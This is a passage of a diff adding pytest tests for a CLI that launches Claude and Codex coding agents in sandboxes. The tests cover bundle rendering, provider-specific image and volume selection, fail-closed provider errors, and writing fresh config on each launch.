SyncResult( success=True, @@ -214,8 +300,11 @@ def test_prepare_start_session_injects_mcp_servers(tmp_path: Path) -> None: plan = prepare_start_session(request, dependencies=dependencies) assert plan.agent_settings is not None - assert "mcpServers" in plan.agent_settings.content - assert "gis-internal" in plan.agent_settings.content["mcpServers"] + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert "mcpServers" in parsed + assert "gis-internal" in parsed["mcpServers"] def test_start_session_runs_sandbox_runtime(tmp_path: Path) -> None: @@ -256,3 +345,1347 @@ def test_start_session_runs_sandbox_runtime(tmp_path: Path) -> None: handle = start_session(plan, dependencies=dependencies) assert handle.sandbox_id == "sandbox-1" + + +# --------------------------------------------------------------------------- +# S01 seam boundary — characterize target shape for T02/T03 +# +# These tests describe the intended state after T02/T03 rewire the launch path: +# - StartSessionPlan should carry a typed AgentLaunchSpec from the provider. +# - StartSessionDependencies should include an AgentProvider, not just AgentRunner. +# The xfail tests will be promoted to passing in T02/T03. +# --------------------------------------------------------------------------- + + +def test_prepared_plan_carries_typed_agent_launch_spec(tmp_path: Path) -> None: + """After T02, StartSessionPlan should include an AgentLaunchSpec field. + + The prepared plan carries a typed provider-owned spec so the runtime layer + can consume it without knowing about Claude-specific settings internals. + """ + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + spec = plan.agent_launch_spec + assert isinstance(spec, AgentLaunchSpec) + assert spec.provider_id != "" + + +def test_start_session_dependencies_accept_agent_provider(tmp_path: Path) -> None: + """After T02, StartSessionDependencies should accept an AgentProvider. + + This characterizes the wiring target: the dependency container must carry a + provider so prepare_start_session can call prepare_launch without falling back + to AgentRunner internals. + """ + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + + deps = StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=FakeAgentRunner(), + agent_provider=FakeAgentProvider(), + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + assert deps.agent_provider is not None + + +# --------------------------------------------------------------------------- +# S04/T05 — Bundle pipeline wiring through AgentProvider.render_artifacts +# --------------------------------------------------------------------------- + + +def _build_org_config_with_bundles( + team_name: str = "alpha", + bundle_id: str = "security-pack", + *, + provider: str = "fake", +) -> NormalizedOrgConfig: + """Build a NormalizedOrgConfig with governed artifacts and bundles.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "safety-net": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="safety-net", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={ + "safety-net": ( + ProviderArtifactBinding( + provider=provider, + native_ref="safety-net-skill", + ), + ), + }, + bundles={ + bundle_id: ArtifactBundle( + name=bundle_id, + description="Security bundle", + artifacts=("safety-net",), + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + ) + from scc_cli.ports.config_models import NormalizedTeamConfig + + return NormalizedOrgConfig( + organization=MagicMock(name="test-org"), + profiles={ + team_name: NormalizedTeamConfig( + name=team_name, + enabled_bundles=(bundle_id,), + ), + }, + governed_artifacts=catalog, + ) + + +def _build_bundle_request( + workspace_path: Path, + *, + team: str = "alpha", + org_config: NormalizedOrgConfig | None = None, + dry_run: bool = False, + offline: bool = False, + standalone: bool = False, +) -> StartSessionRequest: + """Build a StartSessionRequest suitable for bundle pipeline tests.""" + if org_config is None: + org_config = _build_org_config_with_bundles(team) + return StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=team, + session_name=None, + resume=False, + fresh=False, + offline=offline, + standalone=standalone, + dry_run=dry_run, + allow_suspicious=False, + org_config=org_config, + raw_org_config=None, # Prevents marketplace sync (intentional), + provider_id="claude", + ) + + +class TestBundlePipelineWiring: + """Tests for the bundle render pipeline wired through prepare_start_session.""" + + def test_bundle_pipeline_renders_artifacts_into_plan(self, tmp_path: Path) -> None: + """When org config has bundles, the plan carries render results.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = _build_bundle_request(workspace_path) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_error is None + assert len(plan.bundle_render_results) == 1 + result = plan.bundle_render_results[0] + assert isinstance(result, RenderArtifactsResult) + + def test_bundle_pipeline_skipped_when_no_team(self, tmp_path: Path) -> None: + """When no team is set, the bundle pipeline is skipped.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = _build_bundle_request(workspace_path, team=None) # type: ignore[arg-type] + # Need a valid request without team + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_results == () + assert plan.bundle_render_error is None + + def test_bundle_pipeline_skipped_when_dry_run(self, tmp_path: Path) -> None: + """Dry-run mode skips bundle rendering.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = _build_bundle_request(workspace_path, dry_run=True) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_results == () + assert plan.bundle_render_error is None + + def test_bundle_pipeline_skipped_when_offline(self, tmp_path: Path) -> None: + """Offline mode skips bundle rendering.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = _build_bundle_request(workspace_path, offline=True) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_results == () + assert plan.bundle_render_error is None + + def test_bundle_pipeline_skipped_when_standalone(self, tmp_path: Path) -> None: + """Standalone mode skips bundle rendering.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = _build_bundle_request(workspace_path, standalone=True) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_results == () + assert plan.bundle_render_error is None + + def test_bundle_pipeline_no_provider_raises_d032(self, tmp_path: Path) -> None: + """D032: no agent_provider wired + no provider_id raises InvalidProviderError.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + # Deliberately omit provider_id to trigger fail-closed behavior + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team="alpha", + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=_build_org_config_with_bundles("alpha"), + raw_org_config=None, + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=FakeAgentRunner(), + agent_provider=None, # No provider + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + with ( + patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ), + pytest.raises(InvalidProviderError), + ): + prepare_start_session(request, dependencies=dependencies) + + def test_bundle_pipeline_captures_resolution_error(self, tmp_path: Path) -> None: + """When bundle resolution fails (missing bundle), error is captured fail-closed.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + # Reference a bundle that doesn't exist in the catalog + org_config = _build_org_config_with_bundles(bundle_id="nonexistent") + # But the team references a different bundle + from scc_cli.ports.config_models import NormalizedTeamConfig + + org_config = NormalizedOrgConfig( + organization=MagicMock(name="test-org"), + profiles={ + "alpha": NormalizedTeamConfig( + name="alpha", + enabled_bundles=("missing-bundle",), + ), + }, + governed_artifacts=GovernedArtifactsCatalog( + bundles={ + "existing": ArtifactBundle( + name="existing", + artifacts=(), + ), + }, + ), + ) + request = _build_bundle_request(workspace_path, org_config=org_config) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + # Fail-closed: error is captured, not raised + assert plan.bundle_render_error is not None + assert "missing-bundle" in plan.bundle_render_error + assert plan.bundle_render_results == () + + def test_bundle_pipeline_captures_renderer_error(self, tmp_path: Path) -> None: + """When renderer raises MaterializationError, error is captured fail-closed.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + org_config = _build_org_config_with_bundles() + request = _build_bundle_request(workspace_path, org_config=org_config) + resolver_result = _build_resolver_result(workspace_path) + + # Create a provider that raises on render_artifacts + provider = FakeAgentProvider() + + def _exploding_render(plan: ArtifactRenderPlan, workspace: Path) -> RenderArtifactsResult: + raise MaterializationError( + bundle_id="security-pack", + artifact_name="safety-net", + target_path="/tmp/boom", + reason="disk full", + ) + + provider.render_artifacts = _exploding_render # type: ignore[assignment] + dependencies = StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=FakeAgentRunner(), + agent_provider=provider, + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_error is not None + assert "disk full" in plan.bundle_render_error + assert plan.bundle_render_results == () + + def test_bundle_pipeline_empty_bundles_no_error(self, tmp_path: Path) -> None: + """When team has no enabled bundles, pipeline succeeds with empty results.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + from scc_cli.ports.config_models import NormalizedTeamConfig + + org_config = NormalizedOrgConfig( + organization=MagicMock(name="test-org"), + profiles={ + "alpha": NormalizedTeamConfig( + name="alpha", + enabled_bundles=(), # No bundles + ), + }, + ) + request = _build_bundle_request(workspace_path, org_config=org_config) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.bundle_render_results == () + assert plan.bundle_render_error is None + + def test_fake_provider_records_render_calls(self, tmp_path: Path) -> None: + """FakeAgentProvider.render_artifacts records calls for test assertions.""" + provider = FakeAgentProvider() + plan = ArtifactRenderPlan( + bundle_id="test-bundle", + provider="fake", + bindings=(ProviderArtifactBinding(provider="fake", native_ref="test-skill"),), + effective_artifacts=("test-artifact",), + ) + result = provider.render_artifacts(plan, tmp_path) + + assert len(provider.render_artifacts_calls) == 1 + assert provider.render_artifacts_calls[0] == (plan, tmp_path) + assert isinstance(result, RenderArtifactsResult) + + +class TestAgentProviderRenderArtifacts: + """Tests for the render_artifacts method on concrete provider adapters.""" + + def test_claude_provider_render_artifacts(self, tmp_path: Path) -> None: + """ClaudeAgentProvider.render_artifacts delegates to claude_renderer.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + + provider = ClaudeAgentProvider() + plan = ArtifactRenderPlan( + bundle_id="test-bundle", + provider="claude", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="safety-net-skill", + ), + ), + effective_artifacts=("safety-net",), + ) + result = provider.render_artifacts(plan, tmp_path) + + assert isinstance(result, RenderArtifactsResult) + # Skill binding should produce a rendered path + assert len(result.rendered_paths) == 1 + assert result.rendered_paths[0].name == "skill.json" + + def test_codex_provider_render_artifacts(self, tmp_path: Path) -> None: + """CodexAgentProvider.render_artifacts delegates to codex_renderer.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + provider = CodexAgentProvider() + plan = ArtifactRenderPlan( + bundle_id="test-bundle", + provider="codex", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="safety-net-skill", + ), + ), + effective_artifacts=("safety-net",), + ) + result = provider.render_artifacts(plan, tmp_path) + + assert isinstance(result, RenderArtifactsResult) + # Skill binding should produce a rendered path + assert len(result.rendered_paths) == 1 + assert result.rendered_paths[0].name == "skill.json" + + def test_claude_provider_returns_settings_fragment(self, tmp_path: Path) -> None: + """Claude renderer's settings_fragment is propagated through the provider.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + + provider = ClaudeAgentProvider() + plan = ArtifactRenderPlan( + bundle_id="mcp-bundle", + provider="claude", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="gis-server", + transport_type="sse", + native_config={"url": "https://gis.example.com/mcp"}, + ), + ), + effective_artifacts=("gis-mcp",), + ) + result = provider.render_artifacts(plan, tmp_path) + + assert isinstance(result, RenderArtifactsResult) + assert "mcpServers" in result.settings_fragment + assert "gis-server" in result.settings_fragment["mcpServers"] + + def test_codex_provider_maps_mcp_fragment_to_settings_fragment(self, tmp_path: Path) -> None: + """Codex renderer's mcp_fragment is mapped to settings_fragment in the unified result.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + provider = CodexAgentProvider() + plan = ArtifactRenderPlan( + bundle_id="mcp-bundle", + provider="codex", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="gis-server", + transport_type="sse", + native_config={"url": "https://gis.example.com/mcp"}, + ), + ), + effective_artifacts=("gis-mcp",), + ) + result = provider.render_artifacts(plan, tmp_path) + + assert isinstance(result, RenderArtifactsResult) + # Codex mcp_fragment mapped to settings_fragment + assert "mcpServers" in result.settings_fragment + assert "gis-server" in result.settings_fragment["mcpServers"] + + def test_claude_provider_wrong_provider_returns_warnings(self, tmp_path: Path) -> None: + """Claude renderer skips plans targeting a different provider.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + + provider = ClaudeAgentProvider() + plan = ArtifactRenderPlan( + bundle_id="test", + provider="codex", # Wrong provider + effective_artifacts=("something",), + ) + result = provider.render_artifacts(plan, tmp_path) + + assert len(result.warnings) > 0 + assert "codex" in result.warnings[0] + + +# --------------------------------------------------------------------------- +# S02/T02 — Provider-aware image selection and agent_argv propagation +# --------------------------------------------------------------------------- + +_OCI_RUNTIME_INFO = RuntimeInfo( + runtime_id="docker", + display_name="Docker (OCI)", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="Docker version 27.5.1, build abc1234", + daemon_reachable=True, + sandbox_available=True, + preferred_backend="oci", +) + + +def _build_dependencies_with_runtime( + *, + provider: FakeAgentProvider | None = None, + runtime_info: RuntimeInfo | None = None, +) -> StartSessionDependencies: + return StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=FakeAgentRunner(), + agent_provider=provider or FakeAgentProvider(), + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + runtime_info=runtime_info, + ) + + +class TestProviderAwareImageSelection: + """_build_sandbox_spec selects image by provider_id on OCI backend.""" + + def test_codex_image_for_oci_backend(self, tmp_path: Path) -> None: + """Codex provider on OCI backend gets SCC_CODEX_IMAGE_REF.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + codex_provider = CodexAgentProvider() + dependencies = _build_dependencies_with_runtime( + provider=codex_provider, # type: ignore[arg-type] + runtime_info=_OCI_RUNTIME_INFO, + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.image == SCC_CODEX_IMAGE_REF + + def test_claude_image_for_oci_backend(self, tmp_path: Path) -> None: + """Claude provider on OCI backend gets SCC_CLAUDE_IMAGE_REF.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + claude_provider = ClaudeAgentProvider() + dependencies = _build_dependencies_with_runtime( + provider=claude_provider, # type: ignore[arg-type] + runtime_info=_OCI_RUNTIME_INFO, + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.image == SCC_CLAUDE_IMAGE_REF + + def test_docker_sandbox_backend_uses_sandbox_image(self, tmp_path: Path) -> None: + """Non-OCI backend (docker-sandbox) falls back to SANDBOX_IMAGE.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + docker_sandbox_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker Desktop", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="Docker version 27.5.1", + daemon_reachable=True, + sandbox_available=True, + preferred_backend="docker-sandbox", + ) + dependencies = _build_dependencies_with_runtime(runtime_info=docker_sandbox_info) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.image == SANDBOX_IMAGE + + def test_unknown_provider_raises_invalid_provider_error(self, tmp_path: Path) -> None: + """Unknown provider_id on OCI backend raises InvalidProviderError.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + # FakeAgentProvider has provider_id="fake" which is not in the registry + dependencies = _build_dependencies_with_runtime(runtime_info=_OCI_RUNTIME_INFO) + + with ( + patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ), + patch( + "scc_cli.application.start_session.resolve_destination_sets", + return_value=(), + ), + pytest.raises(InvalidProviderError), + ): + prepare_start_session(request, dependencies=dependencies) + + +class TestAgentArgvPropagation: + """agent_argv from AgentLaunchSpec flows into SandboxSpec.""" + + def test_agent_argv_from_launch_spec(self, tmp_path: Path) -> None: + """agent_argv populated from provider's prepare_launch argv.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies_with_runtime() + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + # FakeAgentProvider.prepare_launch returns argv=("fake-agent",) + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.agent_argv == ["fake-agent"] + + def test_no_provider_no_provider_id_raises(self, tmp_path: Path) -> None: + """D032: no provider wired + no provider_id raises InvalidProviderError.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + # Deliberately omit provider_id to trigger fail-closed behavior + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=FakeAgentRunner(), + agent_provider=None, + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + with ( + patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ), + pytest.raises(InvalidProviderError), + ): + prepare_start_session(request, dependencies=dependencies) + + def test_codex_agent_argv_is_codex(self, tmp_path: Path) -> None: + """Codex provider produces the wrapper argv in agent_argv.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + from scc_cli.adapters.codex_launch import build_codex_container_argv + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + codex_provider = CodexAgentProvider() + dependencies = _build_dependencies_with_runtime( + provider=codex_provider, # type: ignore[arg-type] + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.agent_argv == list(build_codex_container_argv()) + + +# --------------------------------------------------------------------------- +# S02/T03 — Provider-aware data_volume and config_dir population +# --------------------------------------------------------------------------- + + +class TestProviderAwareDataVolumeAndConfigDir: + """_build_sandbox_spec populates data_volume and config_dir by provider_id.""" + + def test_codex_data_volume(self, tmp_path: Path) -> None: + """Codex provider on OCI backend gets codex data volume.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + codex_provider = CodexAgentProvider() + dependencies = _build_dependencies_with_runtime( + provider=codex_provider, # type: ignore[arg-type] + runtime_info=_OCI_RUNTIME_INFO, + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.data_volume == "docker-codex-sandbox-data" + + def test_codex_config_dir(self, tmp_path: Path) -> None: + """Codex provider on OCI backend gets .codex config dir.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + codex_provider = CodexAgentProvider() + dependencies = _build_dependencies_with_runtime( + provider=codex_provider, # type: ignore[arg-type] + runtime_info=_OCI_RUNTIME_INFO, + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.config_dir == ".codex" + + def test_claude_data_volume(self, tmp_path: Path) -> None: + """Claude provider on OCI backend gets claude data volume.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + claude_provider = ClaudeAgentProvider() + dependencies = _build_dependencies_with_runtime( + provider=claude_provider, # type: ignore[arg-type] + runtime_info=_OCI_RUNTIME_INFO, + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.data_volume == "docker-claude-sandbox-data" + assert plan.sandbox_spec.config_dir == ".claude" + + def test_non_oci_backend_empty_volume_and_config(self, tmp_path: Path) -> None: + """Non-OCI backend leaves data_volume and config_dir empty.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + docker_sandbox_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker Desktop", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="Docker version 27.5.1", + daemon_reachable=True, + sandbox_available=True, + preferred_backend="docker-sandbox", + ) + dependencies = _build_dependencies_with_runtime(runtime_info=docker_sandbox_info) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.sandbox_spec is not None + assert plan.sandbox_spec.data_volume == "" + assert plan.sandbox_spec.config_dir == "" + + +# --------------------------------------------------------------------------- +# D038/D042 — Config freshness on every fresh launch +# --------------------------------------------------------------------------- + + +class TestConfigFreshness: + """D038/D042: fresh launch always writes SCC-managed config; resume skips.""" + + def _make_request( + self, + workspace_path: Path, + *, + resume: bool = False, + team: str | None = None, + org_config: NormalizedOrgConfig | None = None, + raw_org_config: dict[str, Any] | None = None, + ) -> StartSessionRequest: + return StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=team, + session_name=None, + resume=resume, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=org_config, + raw_org_config=raw_org_config, + provider_id="claude", + ) + + def test_fresh_launch_no_settings_produces_empty_config(self, tmp_path: Path) -> None: + """D038: fresh launch with no sync/effective config still writes empty settings.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = self._make_request(workspace_path, resume=False) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.agent_settings is not None + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert parsed == {} + + def test_resume_skips_settings_injection(self, tmp_path: Path) -> None: + """D038: resume leaves existing container config untouched (returns None).""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = self._make_request(workspace_path, resume=True) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + # Resume returns None — OCI runtime skips injection + assert plan.agent_settings is None + + def test_governed_to_standalone_transition(self, tmp_path: Path) -> None: + """D038: governed→standalone fresh launch overwrites with empty config. + + Simulates: team A config was injected on a prior launch. A new + fresh launch with no team/no org config still writes an empty + settings file, clearing stale team-specific config from the volume. + """ + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + # Standalone: no team, no org config + request = self._make_request(workspace_path, resume=False, team=None) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + # Fresh launch always writes settings, even standalone + assert plan.agent_settings is 